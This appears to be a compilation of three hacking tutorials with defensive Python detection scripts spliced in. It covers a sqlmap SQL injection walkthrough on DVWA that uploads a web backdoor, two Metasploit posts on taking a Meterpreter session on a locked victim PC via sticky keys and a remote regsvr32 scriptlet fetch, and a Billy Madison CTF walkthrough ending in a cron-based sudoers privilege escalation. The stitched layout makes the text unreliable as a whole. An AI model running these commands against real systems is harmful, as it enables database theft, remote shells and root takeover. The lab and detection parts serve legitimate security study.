SQL Injection Exploitation in DVWA (Bypass All Security)

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool

First, install the DVWA lab on your XAMPP or WAMP server (read the full article here).
Now open DVWA on your PC and log in with the following credentials:
Username – admin
Password – password

Bypass Low Level Security


Click on DVWA Security and set the website security level to Low.


From the list of vulnerabilities, select SQL Injection. Type user ID 1 in the text box, but do not click Submit yet: first set your browser proxy so that Burp Suite can intercept the request.


Start Burp Suite in Kali Linux, click Proxy in the menu bar and make sure Intercept is on. Go back to the browser and click Submit. The Intercept tab shows the HTTP and WebSocket messages that pass between your browser and the web server. Copy the complete intercepted request, paste it into Leafpad and save it on the desktop as 1.


Open a terminal and type the following command to run the SQL injection attack with sqlmap.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump all --os-shell
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. -r tells sqlmap to load the intercepted HTTP request from the file /root/Desktop/1 and analyse it.


Notice that I have used --dbs in the above command, which fetched all database names as you can see in the image below. sqlmap then asks whether to store the hashes in a temporary file: type y and hit enter.


Next it extracts the table user from the database dvwa, which I specified in the above command as -D dvwa.

Great, we have dumped the user table successfully. Look at the fetched data: for each user it contains the login ID, failed-login count, first name, last name and password hash.


Table guestbook of database dvwa, which has only 1 entry.


Now the tool will try to upload a web backdoor for a command prompt, and asks you to choose the language for the backdoor.
Type 4 and hit enter.

Afterwards it asks you to choose an option for the location of a writable directory.
Type 1 and hit enter.


You can see the backdoor has been successfully uploaded to the destination folder. Type y to retrieve the command standard output. Now I am inside the os-shell that I requested with the --os-shell option.
os-shell> net users


Bypass Medium Level Security

Click on DVWA Security and set the website security level to Medium.

From the list of vulnerabilities, select SQL Injection. Select user ID 2 from the list. Set the proxy, turn on Intercept in Burp Suite and come back to the web browser to submit.


Following the same process, save the request captured by Intercept on the desktop as file 2.


Now that the security level is increased I was unable to get an os-shell, but I successfully retrieved all the details of the database by typing the following command in the terminal.
sqlmap -r /root/Desktop/2 --dbs -D dvwa --dump all


Again I got all the database names, including dvwa. Type y again to continue.


Table user of database dvwa: it has again dumped the same login ID, failed-login count, first name, last name and password hash for each user.


Table guestbook of database dvwa, which has only 1 entry.


Bypass High Level Security

Click on DVWA Security and set the website security level to High.

This is very similar to the low level, however this time the attacker is inputting the value in a different manner. The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.


Here you find a different scenario when you select SQL Injection; don't panic, follow the steps carefully, this level is quite similar to low security. As a hint, the developer tells us that the submitted user ID is redirected to another page through a POST action.

Click on the link "here to change your ID", which redirects to a new window. Type ID 1, turn on Intercept, then come back and click Submit.


Now compare the intercepted data of the high and low levels: you will find that a POST action is used in high security whereas a GET action is used in the low security level. Copy the complete data and make the following change to it. For help, look at the images below.


Paste the copied data into Leafpad, replace POST with GET and add /?id=1&Submit=Submit, then save the file as third on the desktop.
GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
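The request line above is what sqlmap replays, with its probes substituted into the id parameter. As an added defender-side example (not code from the original walkthrough), the following Python parses constructed Apache access-log lines for the DVWA sqli page and flags sqlmap's User-Agent and injection fragments in the id parameter; the log lines, the SQLI_PATH constant and the pattern list are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format access log lines (not from the original walkthrough).
# Line 1 is the normal request shown above, lines 2-3 are the kind of probes sqlmap sends, line 4 is benign.
SAMPLE_LOG = """\
192.168.0.106 - - [10/Jan/2017:10:00:01 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.0.106 - - [10/Jan/2017:10:00:02 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27%20AND%201%3D1%20--%20&Submit=Submit HTTP/1.1" 200 4521 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.0.106 - - [10/Jan/2017:10:00:03 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--&Submit=Submit HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.0.106 - - [10/Jan/2017:10:00:04 +0000] "GET /DVWA/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4530 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Fragments typical of boolean/UNION probes against a numeric id parameter.
SQLI_RE = re.compile(
    r"(\bUNION\b.*\bSELECT\b|\b(AND|OR)\b\s+\d+\s*=\s*\d+|'\s*(AND|OR)\b|--\s|/\*|\bSLEEP\s*\()",
    re.IGNORECASE,
)
SQLI_PATH = "/DVWA/vulnerabilities/sqli"  # assumed install path, as in the request line above

def analyze(line):
    """Return a finding dict for one log line hitting the sqli page, or None if it does not parse/apply."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["target"])
    if not url.path.startswith(SQLI_PATH):
        return None
    ids = parse_qs(url.query, keep_blank_values=True).get("id", [])  # parse_qs URL-decodes the values
    reasons = []
    if m["ua"].lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")
    for value in ids:
        if not value.isdigit():  # DVWA's id is meant to be a number; anything else deserves a look
            reasons.append("non-numeric id")
            if SQLI_RE.search(value):
                reasons.append("sqli pattern in id")
    return {"ip": m["ip"], "ts": m["ts"], "ids": ids, "reasons": reasons}

def find_suspicious(log_text):
    """All parsed lines that produced at least one reason."""
    return [f for f in map(analyze, log_text.splitlines()) if f and f["reasons"]]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["ids"], ", ".join(f["reasons"]))
```

At the High level the id is posted to a separate page and carried in the session, so it never appears in the query string of the sqli request; the same checks then have to run on the POST body from a WAF or application log rather than on the access log.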


Here we go!
Same process as above, and this time I will again try for an os-shell.
sqlmap -r /root/Desktop/third --dbs -D dvwa --dump all --os-shell


Again I got all the database names, including dvwa. Type y again to continue.


Table user of database dvwa: it has again dumped the same login ID, failed-login count, first name, last name and password hash for each user.


Table guestbook of database dvwa, which has only 1 entry.
Oops! Failed to get an os-shell, but we have retrieved the dvwa database under high security.

Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)

Let's learn how to get a Meterpreter session on a PC in the network that is switched on but locked and has the Remote Desktop feature enabled.
Let us assume that the victim's PC already has the utilman or sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.
You do not need physical access to the victim's PC for this attack.
First, run Metasploit on your PC.

$msfconsole


Then we search for regsvr32_applocker_bypass_server, use the exploit, set the payload, lhost and lport, and run exploit.
use exploit/windows/misc/regsvr32_applocker_bypass_server
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit


Open another terminal to take a Remote Desktop session of the victim's PC, entering the victim's IP.
$rdesktop 192.168.0.103


You get the remote desktop of the victim’s pc.


Press the “shift” key 5 times to bring up the command prompt.


Returning to our previous terminal with Meterpreter, we have finally got a session on the victim's PC in our terminal.


Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast.

Hack Lock PC in Network using Metasploit

Today we will discover how to get a Meterpreter session on a PC in the network that is switched on but locked.

Let us assume that our victim’s pc already has sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.


You will need physical access to the victim's PC for this attack. Press the Shift key 5 times on the victim's PC to bring up the command prompt.


Next, we run Metasploit on our own PC.

$msfconsole


Then we search for regsvr32_applocker_bypass_server, use the exploit, set the payload, lhost and lport, and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit


Take note of the command generated by Metasploit and run it in the command prompt on the victim's PC.

Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll
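As an added detection example that is not part of the original post, the following Python runs two checks over constructed process-creation records in the shape of Sysmon Event ID 1 fields: regsvr32 registering a scriptlet fetched over HTTP through scrobj.dll (the command above), and a shell spawned by winlogon.exe, which is the footprint of the sticky-keys/utilman replacement the post assumes. The field names, the SHELLS set and the sample records are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (Sysmon Event ID 1 style fields), not from the original post.
# Record 1 mirrors the regsvr32 command above; record 3 is the shell a sticky-keys backdoor pops at the lock screen.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe", "User": "HOST\\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "sethc.exe 211",
     "ParentImage": r"C:\Windows\System32\winlogon.exe", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "HOST\\alice"},
]

SHELLS = {"cmd.exe", "powershell.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_regsvr32(ev):
    """regsvr32 asked to register a scriptlet fetched over HTTP(S) through scrobj.dll."""
    if basename(ev["Image"]) != "regsvr32.exe":
        return None
    m = re.search(r"/i:(\S+)", ev["CommandLine"], re.IGNORECASE)
    if not m:
        return None
    target = m.group(1).strip('"')
    remote = urlparse(target).scheme.lower() in ("http", "https")
    if remote and "scrobj.dll" in ev["CommandLine"].lower():
        return f"regsvr32 scriptlet from {target}"
    return None

def check_lockscreen_shell(ev):
    """A shell whose parent is winlogon.exe: the footprint of a replaced sethc.exe/utilman.exe."""
    if basename(ev["ParentImage"]) == "winlogon.exe" and basename(ev["Image"]) in SHELLS:
        return f"shell spawned by winlogon as {ev['User']}: {ev['CommandLine']}"
    return None

def triage(events):
    """Run every rule over every record and return the findings in record order."""
    hits = []
    for ev in events:
        for rule in (check_regsvr32, check_lockscreen_shell):
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```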


Voila, we have the session of the victim's PC in our Meterpreter.

Hack the Billy Madison VM (CTF Challenge)

Today in our CTF challenges we are going to do Billy Madison. This VM is based on 90’s movie Billy Madison, hence the name of the VM. The main aim of this VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy's 12th grade final project. You will probably need to root the VM to complete this objective. Without further ado let’s start.
Download the lab from: https://www.vulnhub.com/entry/billy-madison-11,161/

WalkThrough
Let’s locate our target



Our target is 192.168.1.103. Scan it with nmap.

nmap -p- -A 192.168.1.103


Okay! So from nmap we have discovered the ports 22, 23, 69, 80, 137, 138, 139, 445 and 2525. So I opened our target in the browser at port 69.




A WordPress website opens. I explored it a lot and tried to exploit it, but it was useless. So I simply opened our target in the browser at its default port, i.e. 80. The following page opens:


Then I explored the SMB port.
smbclient -L 192.168.0.103
When it asks for a password, just hit enter without entering one.



Here I found an EricSecretStuff share. Let's see what it has to offer; for that, type the following combination of commands:
smbclient //192.168.0.103/EricSecretStuff
dir
get ebd.txt
exit
cat ebd.txt


It just told us that the backdoor is currently closed. So then I tried telnet.
telnet 192.168.0.103


There was a message in telnet telling us the password and that it had been encrypted with ROT13 (hint: ROTten). Let's decode it.


Decoding it gives exschmenuating. This could be a directory, so I opened it in the browser.



In the browser it opened a webpage which gave us a few hints for moving forward. From it we now know that there is a .cap file, that it is saved under a name which includes 'veronica', and that the name can be derived from rockyou.txt.
There are many names in rockyou.txt, but we only need the ones with veronica in them; for that use the following command:
grep -i veronica /usr/share/wordlists/rockyou.txt > /root/Desktop/dict.txt


Executing the above command creates a text file with the names containing veronica. Now use this text file to find the file with veronica in its name through DirBuster: open DirBuster, enter the URL in the Target URL text box, then give the path of the text file you just created with grep. Enter the directory name in the "Dir to start with" text box and give cap as the file extension.


As a result it shows the file 012987veronica.cap.


Open it in the browser. It will ask you to download it; go ahead.


Now check the TCP stream of every packet. In one of them you will find an email sent from Eric to Veronica, telling her to download a certain antivirus.



In another TCP stream you will find that Veronica has replied to Eric, asking him to share the link through an FTP server, along with a YouTube link.


Again, in the TCP stream of a packet you will find that Eric has told her his username and password.



OK! So we have Eric's username and password. Keep them for later use. Meanwhile, let's check out the YouTube link.


In the video it says a combination of numbers. These numbers could be used for port knocking, so let's try it.
for x in 1466 67 1468 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 192.168.0.103; done



Then, to check, I fired up nmap again.
nmap -p- 192.168.0.103


And voila! The FTP port 21 is now open. Let's enter through it, as we have the username and password of eric that we discovered earlier.

ftp 192.168.0.103
Now let’s see the directories in it.
dir
There is a file named .notes. I decided to read it, but before doing so I had to download it, so type:
get .notes
exit


Now that the notes file is downloaded, type the following command in the Kali terminal to read it:
cat .notes



There was a message in the notes by Eric. If you remember the conversation between Veronica and Eric, you know that there are two users on the FTP server; the second one is veronica. Naturally I decided to use hydra to brute-force FTP for the username and password, using the same dictionary file I had created with grep.

hydra -l veronica -P /root/Desktop/ver.txt ftp://192.168.0.103


And yes! We have the username and password, i.e. veronica and babygirl_veronica07@yahoo.com respectively. Then I decided to explore more of the FTP server with veronica's credentials and found two files there, one .cap and one .eml. I downloaded them both; to do so, type the following combination of commands:

ftp 192.168.0.103
dir
binary
get eg-01.cap
get email-from-billy.eml


Let’s read the email now.


In the mail he says how he hacked Eric's wireless password. But if you observe carefully you will find that he used swaks to send this mail. swaks (Swiss Army Knife for SMTP) is a featureful, flexible, scriptable, transaction-oriented SMTP test tool developed by John Jetmore. So I used the following command next:
swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.0.104:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be soccer player"




Further, I used aircrack-ng on eg-01.cap, because the email sent through swaks mentioned something about a wifi password.
aircrack-ng /root/Desktop/eg-01.cap -w /usr/share/wordlists/rockyou.txt


And with aircrack-ng we found the wireless password, i.e. triscuit*.


Now scan it again with nmap.
nmap -p- -A 192.168.0.103

As a result you can see that a new port is open, i.e. 1974 with an SSH service. Let's try to log in with SSH.
ssh eric@192.168.0.103 -p 1974
Then give the password triscuit*. Once logged in, I checked the Linux version with the following command, but it was not exploitable.
lsb_release -a
Then I typed the following command to see what it has to offer:
ls
There I found a text file, so I decided to read it.
cat why-1974.txt


Then type the following command to list SGID files:
find / -perm -2000 -type f 2>/dev/null



I was pretty lost here, so I decided to take some help from Mr. Goblin (https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/) and typed the following set of commands:

touch /tmp/test
/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
chmod +x /etc/cron.hourly/test
cat /etc/cron.hourly/test
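As an added defender-side example that is not part of the walkthrough, the following Python audits the two things the commands above tamper with: it parses sudoers text for NOPASSWD rules and checks a cron directory for entries not owned by root or writable by others. The sudoers content is constructed, and a temporary directory stands in for /etc/cron.hourly, with its owner standing in for root because the demo runs unprivileged.

```python
import re
import stat
import tempfile
from pathlib import Path

# Constructed sudoers content (not from the original VM); the last entry is what the cron job above appends.
SAMPLE_SUDOERS = """\
Defaults env_reset
%sudo ALL=(ALL:ALL) ALL
alice ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
eric ALL=(ALL) NOPASSWD:ALL
"""
# user  hosts = (runas) TAG: commands   (comment and Defaults lines are skipped before matching)
SUDOERS_RE = re.compile(r"^\s*(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+?)\s*$")

def audit_sudoers(text):
    """(user, commands) for every rule that runs without a password; NOPASSWD with commands ALL is the red flag."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", "Defaults")):
            continue
        m = SUDOERS_RE.match(line)
        if m and "NOPASSWD" in m["tags"].upper():
            findings.append((m["who"], m["cmds"].strip()))
    return findings

def audit_cron_dir(path, trusted_uid=0):
    """Entries in a cron directory not owned by the trusted uid or writable by group/others."""
    findings = []
    for p in sorted(Path(path).iterdir()):
        st = p.lstat()
        problems = []
        if st.st_uid != trusted_uid:
            problems.append(f"owner uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append("group/world writable")
        if problems:
            findings.append((p.name, problems))
    return findings

def build_sample_cron_dir():
    """Throwaway stand-in for /etc/cron.hourly: one normal job plus a world-writable planted script."""
    d = Path(tempfile.mkdtemp(prefix="cron.hourly-"))
    for name, mode in (("logrotate", 0o755), ("test", 0o777)):
        (d / name).write_text("#!/bin/sh\n# constructed sample job\n")
        (d / name).chmod(mode)
    return d

def run_demo():
    d = build_sample_cron_dir()
    return audit_sudoers(SAMPLE_SUDOERS), audit_cron_dir(d, trusted_uid=d.stat().st_uid)
```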



This way you escalate privileges and reach root. Let's see what files root has:

ls

I decided to look into the /PRIVATE directory.

cd /PRIVATE

ls

Here I found two files, hint.txt and BowelMovement. First I opened hint.txt.

cat hint.txt

In this file he talks about the BowelMovement file and about its password, which is in the link given. So I copied the BowelMovement file.

cp BowelMovement /var/www/html


And then I created a dictionary file using cewl and that link.

cewl --depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt


By brute forcing with this dictionary file you will find the correct password. Using that password, open the BowelMovement file you downloaded.



Then open the same in the Kali terminal and type:
ls
There is a file called secret.zip; unzip it.
unzip secret.zip


In the zipped folder there were two files. I decided to read them both.
cat THE-END.txt
cat Billy_Madison12th_Grade_Fimal_Project.doc


Finally! We have solved the CTF. Enjoy!